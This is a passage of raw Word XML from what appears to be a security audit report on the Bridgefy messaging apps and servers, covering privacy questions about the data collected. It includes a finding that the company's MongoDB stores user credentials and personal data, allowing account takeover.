      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>potential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>privacy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>concern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>broader context remains unknown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="377" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Unclear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Initial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>suspicion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>confirmed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>privacy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>concern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>assumed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250012" w:id="43"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-Q02:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>gathered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Proven</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Privacy Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The Bridgefy team</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>publicly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>discloses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>collected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>platform via the company’s privacy policy page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>186</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. The page stipulates the rights users of the platform have over the data collected as well as a clear path to get in contact with the Bridgefy team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>What</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>files/information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>gathered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>servers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>During the code review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>dynamic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>app,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>apps,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and SDK,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>collected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Inc.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and third-party servers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Part</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Collected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Servers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The most concerning data collection was identified in the Bridgefy MongoDB, which stores credentials and PII of regular Bridgefy users and hence allows arbitrary user takeover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacks,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>including</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-026</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>other</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487634432">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>175260</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="120" name="Graphic 120"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="120" name="Graphic 120"/>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3.8pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15682048;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape90" coordorigin="1440,276" coordsize="2880,0" path="m1440,276l4320,276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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>186</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="20"/>
